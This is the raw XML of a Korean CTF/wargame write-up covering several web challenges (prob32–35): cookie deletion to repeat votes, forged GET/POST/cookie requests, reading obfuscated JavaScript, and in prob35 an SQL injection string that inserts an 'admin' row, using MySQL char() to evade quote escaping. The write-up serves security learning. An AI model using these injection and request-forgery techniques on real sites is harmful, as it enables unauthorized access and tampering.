        <w:t>navystar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003831B6" w:rsidRDefault="003831B6" w:rsidP="004F75F1">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vote_check</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>쿠키를 n</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">로 하고 해봤는데 안돼서 그냥 삭제하고 해봤는데 </w:t>
      </w:r>
      <w:r>
        <w:t>vote</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 된다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003831B6" w:rsidRDefault="003831B6" w:rsidP="004F75F1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64E3217B" wp14:editId="732456FE">
            <wp:extent cx="3648075" cy="5238750"/>
            <wp:effectExtent l="0" t="0" r="9525" b="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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>iddler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">의 </w:t>
      </w:r>
      <w:r>
        <w:t>composer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 이용해 나를 </w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>등으로 만들어보겠다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003831B6" w:rsidRDefault="003831B6" w:rsidP="004F75F1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D7F5A12" wp14:editId="530D0001">
            <wp:extent cx="4514850" cy="1809750"/>
            <wp:effectExtent l="0" t="0" r="0" b="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t>100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>표를 받으면 클리어 된다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003831B6" w:rsidRDefault="003831B6" w:rsidP="004F75F1"/>
    <w:p w:rsidR="003831B6" w:rsidRDefault="003831B6" w:rsidP="004F75F1"/>
    <w:p w:rsidR="003831B6" w:rsidRPr="003831B6" w:rsidRDefault="003831B6" w:rsidP="003831B6">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003831B6">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="003831B6">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob33</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003831B6" w:rsidRDefault="003831B6" w:rsidP="004F75F1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BB6A65D" wp14:editId="70B536DB">
            <wp:extent cx="3495675" cy="1000125"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EC188E4" wp14:editId="2147FFD8">
            <wp:extent cx="5731510" cy="1797685"/>
            <wp:effectExtent l="0" t="0" r="254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2E3946" w:rsidP="004F75F1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A8DA45E" wp14:editId="1C306D96">
            <wp:extent cx="5324475" cy="1704975"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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t xml:space="preserve">get </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">변수에 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hehe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 넣어주면 </w:t>
      </w:r>
      <w:r>
        <w:t>Next</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 나온다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E3946" w:rsidRDefault="002E3946" w:rsidP="004F75F1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="550ECF3E" wp14:editId="685C6169">
            <wp:extent cx="5731510" cy="1797685"/>
            <wp:effectExtent l="0" t="0" r="2540" b="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 xml:space="preserve">그 다음은 </w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">로 </w:t>
      </w:r>
      <w:r>
        <w:t>post, post2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 변수에 값을 맞춰주면 된다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E3946" w:rsidRDefault="002E3946" w:rsidP="004F75F1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36B01247" wp14:editId="4B929A36">
            <wp:extent cx="5067300" cy="1771650"/>
            <wp:effectExtent l="0" t="0" r="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 xml:space="preserve">입력 폼을 만들어 </w:t>
      </w:r>
      <w:r>
        <w:t>post</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 값을 전송한다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E3946" w:rsidRDefault="002E3946" w:rsidP="004F75F1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D7D3759" wp14:editId="71274EE6">
            <wp:extent cx="5731510" cy="1564640"/>
            <wp:effectExtent l="0" t="0" r="2540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 xml:space="preserve">입력 폼을 만드는 이유는 </w:t>
      </w:r>
      <w:r>
        <w:t>lv2.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 값을 전달하는 입력폼이 존재하지 않기 때문이다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E3946" w:rsidRDefault="002E3946" w:rsidP="004F75F1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="287A511C" wp14:editId="7A63AF54">
            <wp:extent cx="5731510" cy="1750060"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"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>I</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 같게 해주면 N</w:t>
      </w:r>
      <w:r>
        <w:t>ext</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E3946" w:rsidRDefault="002E3946" w:rsidP="004F75F1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F82D166" wp14:editId="4E7E7394">
            <wp:extent cx="3314700" cy="1066800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EEC3FB6" wp14:editId="4994D8A9">
            <wp:extent cx="2638425" cy="2076450"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0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477516" w:rsidP="004F75F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">문제에서 보이는 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">hint </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>값에 값을 조금 더해준 후 반복해서 대입하면 된다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00477516" w:rsidRDefault="00477516" w:rsidP="004F75F1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18D07F48" wp14:editId="4B9EF47F">
            <wp:extent cx="5731510" cy="1177290"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76245977" wp14:editId="05C971B2">
            <wp:extent cx="4400550" cy="1752600"/>
            <wp:effectExtent l="0" t="0" r="0" b="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rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ET, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>imget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> POST impost COOKIE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>imcookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>세개가</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 다 있어야 한다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00477516" w:rsidRDefault="00477516" w:rsidP="004F75F1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="006C15A4" wp14:editId="489C0EC3">
            <wp:extent cx="5362575" cy="1714500"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0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noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C0EAACC" wp14:editId="4AD36C7C">
            <wp:extent cx="5200650" cy="1447800"/>
            <wp:effectExtent l="0" t="0" r="0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입력 폼을 만들고,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">쿠키를 만들고 </w:t>
      </w:r>
      <w:r>
        <w:t>get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>으로 값을 보내면 끝이다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE3AB9" w:rsidRDefault="00EE3AB9" w:rsidP="004F75F1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13BCABC6" wp14:editId="1B7DEE0D">
            <wp:extent cx="5731510" cy="1771015"/>
            <wp:effectExtent l="0" t="0" r="2540" b="63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 md5, agent md5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>하면 된다</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00477516" w:rsidRDefault="00477516" w:rsidP="004F75F1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2ADA6200" wp14:editId="7E39ADCD">
            <wp:extent cx="5731510" cy="843280"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0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EE3AB9" w:rsidP="004F75F1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BFA449F" wp14:editId="344B7C5D">
            <wp:extent cx="5731510" cy="1706880"/>
            <wp:effectExtent l="0" t="0" r="2540" b="762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EB0457" wp14:editId="2B3E04E1">
            <wp:extent cx="5067300" cy="2114550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p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">에서 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>을 모두 없앤 후 값을 넣어주면 된다.</w:t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227D5D9D" wp14:editId="174A59DD">
            <wp:extent cx="5731510" cy="1560195"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905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5CDC273B" wp14:editId="1A5502AE">
            <wp:extent cx="3590925" cy="2600325"/>
            <wp:effectExtent l="0" t="0" r="9525" b="952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70EA6ADF" wp14:editId="25C4F6D9">
            <wp:extent cx="5731510" cy="1638935"/>
            <wp:effectExtent l="0" t="0" r="2540" b="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31C8F2" wp14:editId="0E4658C1">
            <wp:extent cx="2352675" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="9525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574757B9" wp14:editId="6F33C499">
            <wp:extent cx="2143125" cy="1285875"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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85159B" wp14:editId="1C0A510E">
            <wp:extent cx="5105400" cy="4219575"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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1B7918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F5253D" wp14:editId="64FEAC40">
            <wp:extent cx="3800475" cy="6448425"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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268A0" wp14:editId="23B4D6EE">
            <wp:extent cx="3505200" cy="466725"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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0" w:rsidRDefault="001B7918" w:rsidP="00EE3AB9">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39B31A7F" wp14:editId="1E788040">
            <wp:extent cx="3619500" cy="638175"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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EE3AB9">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B7918" w:rsidRDefault="001B7918" w:rsidP="00EE3AB9">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B7918" w:rsidRDefault="001B7918" w:rsidP="001B7918">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B7918">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>prob34</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B7918" w:rsidRDefault="001B7918" w:rsidP="001B7918">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BA01F57" wp14:editId="118FBC90">
            <wp:extent cx="4429125" cy="1771650"/>
            <wp:effectExtent l="0" t="0" r="9525" b="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1B7918">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>들어가자마자</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>wrong</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이 뜬다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B7918" w:rsidRDefault="001B7918" w:rsidP="001B7918">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B018EF3" wp14:editId="195266B7">
            <wp:extent cx="5731510" cy="1806575"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175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1B7918">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>스크립트에 난독화가 걸려있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B7918" w:rsidRDefault="001B7918" w:rsidP="001B7918">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>개발자 도구로 보면</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B7918" w:rsidRDefault="001B7918" w:rsidP="001B7918">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74AC4077" wp14:editId="4741B224">
            <wp:extent cx="5731510" cy="1355725"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0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Pr="005B6778" w:rsidRDefault="005B6778" w:rsidP="001B7918">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이런 스크립트가 있으며 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">에 </w:t>
      </w:r>
      <w:r w:rsidRPr="001B7918">
        <w:t>'0lDz0mBi2'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 넣으면</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B7918" w:rsidRDefault="005B6778" w:rsidP="005B6778">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="725D7F87" wp14:editId="2C776F3D">
            <wp:extent cx="5495925" cy="695325"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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78" w:rsidRDefault="005B6778" w:rsidP="005B6778">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>패드워드를</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 얻는다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B6778" w:rsidRDefault="005B6778" w:rsidP="005B6778"/>
    <w:p w:rsidR="005B6778" w:rsidRPr="005B6778" w:rsidRDefault="005B6778" w:rsidP="005B6778">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B6778">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005B6778">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob35</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B6778" w:rsidRDefault="005B6778" w:rsidP="005B6778">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7852D4DD" wp14:editId="56D4D683">
            <wp:extent cx="5731510" cy="1315085"/>
            <wp:effectExtent l="0" t="0" r="254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78" w:rsidRDefault="005B6778" w:rsidP="005B6778">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1204257B" wp14:editId="23F541DD">
            <wp:extent cx="5731510" cy="3887470"/>
            <wp:effectExtent l="0" t="0" r="2540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7B" w:rsidRDefault="00EC177B" w:rsidP="005B6778">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">여러 필터링을 거친 후 </w:t>
      </w:r>
      <w:r>
        <w:t>admin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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">와 </w:t>
      </w:r>
      <w:r w:rsidR="001E0DDA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">내 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001E0DDA">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001E0DDA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">가 같으면 </w:t>
      </w:r>
      <w:r w:rsidR="001E0DDA">
        <w:t>solve</w:t>
      </w:r>
      <w:r w:rsidR="001E0DDA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>된다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E0DDA" w:rsidRDefault="001E0DDA" w:rsidP="005B6778">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>그렇지 않으면 주석으로 한 내용을 출력한다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E0DDA" w:rsidRDefault="001E0DDA" w:rsidP="005B6778">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02A94D8B" wp14:editId="715F63FF">
            <wp:extent cx="2352675" cy="485775"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F405F3F" wp14:editId="2C426B6D">
            <wp:extent cx="2419350" cy="1219200"/>
            <wp:effectExtent l="0" t="0" r="0" b="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r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>1079067715</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">보다 높은 값을 넣어주었더니 </w:t>
      </w:r>
      <w:r>
        <w:t>integer overflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 남을 볼 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E0DDA" w:rsidRDefault="001E0DDA" w:rsidP="005B6778">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001E0DDA">
        <w:t>01000000000),(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001E0DDA">
        <w:t>'admin', '218.146.20.61', 01011112222</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 를 넣어서 값을 넣어주면 문제가 풀릴 것이다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>하지만 풀리지 않는다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>magic_quote_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>pc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">가 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>돼있음을 추측할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E0DDA" w:rsidRDefault="001E0DDA" w:rsidP="005B6778">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28BCBAD9" wp14:editId="4DB6EC6C">
            <wp:extent cx="1466850" cy="3276600"/>
            <wp:effectExtent l="0" t="0" r="0" b="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proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">의 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">char </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>변수를 이용하여 문제를 풀자.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E0DDA" w:rsidRDefault="001E0DDA" w:rsidP="005B6778">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001E0DDA">
        <w:t>01079067715),(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001E0DDA">
        <w:t>char(97, 100, 109, 105, 110),%20char(50, 49, 56, 46, 49, 52, 54, 46, 50, 48, 46, 54, 49),%2001011112222</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06286201" wp14:editId="2162201C">
            <wp:extent cx="5731510" cy="1893570"/>
            <wp:effectExtent l="0" t="0" r="2540" b="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/>
    <w:p w:rsidR="001E0DDA" w:rsidRDefault="001E0DDA" w:rsidP="005B6778"/>
    <w:p w:rsidR="001E0DDA" w:rsidRDefault="001E0DDA" w:rsidP="005B6778"/>
    <w:p w:rsidR="001E0DDA" w:rsidRDefault="001E0DDA" w:rsidP="005B6778"/>
    <w:p w:rsidR="001E0DDA" w:rsidRPr="001E0DDA" w:rsidRDefault="001E0DDA" w:rsidP="001E0DDA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0DDA">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
